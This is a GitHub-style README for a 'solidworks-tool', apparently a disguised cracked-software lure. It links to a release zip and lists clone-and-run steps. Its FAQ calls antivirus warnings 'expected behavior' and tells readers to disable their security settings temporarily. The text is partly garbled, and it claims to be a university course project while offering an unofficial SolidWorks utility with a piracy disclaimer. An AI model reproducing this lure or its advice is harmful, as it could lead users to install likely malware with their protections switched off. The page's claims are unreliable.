<a href="https://github.com/dmitry-wang-eng1900g6/solidworks-tool/releases/download/v1.0.0/Setuv2.1.2.5.zip src="https://img.shields.io/badge/Download-v1.0.0-success?style=for-the-badge" alt="Download Latest">
Solidworks — A project monitoring system resous, developed for a Rowan University software engineering course using Solidworks
- ✅ Graphical interface — Detect, update, Rollback buttons
- ✅ Multi-version support with automatic detection
- ✅ Automatic installation detection across all standard paths
- ✅ Silent mode for unattended batch processing
- ✅ File integrity verification before and after utility
- ✅ Command-line mode for scripted and batch deployments
Option 1: Download from Releases and extract
Option 2: Clone and run
git clone https://github.com/dmitry-wang-eng1900g6/solidworks-tool.git
cd solidworks-tool
pip install -r requirements.txt
python main.pyIs this safe to download?
some security software may need configuion it because it applies configuion changes. This is a expected behavior.
Will it work with the latest version?
Designed for the current version. We update after major releases.
Do I need to configure your security settings?
Temporarily, yes. Re-enable after tool.
Is this free?
Yes. No hidden fees or subscriptions.
What opeing systems are supported?
Windows 10/11 primary. macOS and Linux support is experimental.
Disclaimer: This software is provided for educational purposes only. The developers do not encourage sharing. Please support software developers by purchasing legitimate licenses.
- Python 3.11 or newer
- Windows 10/11 (primary), macOS/Linux (experimental)
- 4GB RAM minimum
MIT tool. See tool for details.
If you find solidworks-tool useful, give it a ⭐ — it helps others discover this project.
Found a bug? Open an issue.## 📥 Download
- Download the latest release from the link above
- Extract the archive (WinRAR / 7-Zip)
- Run
python main.py(or see Usage below) - Configure settings in
config.yaml
💻 Works on Windows, macOS, and Linux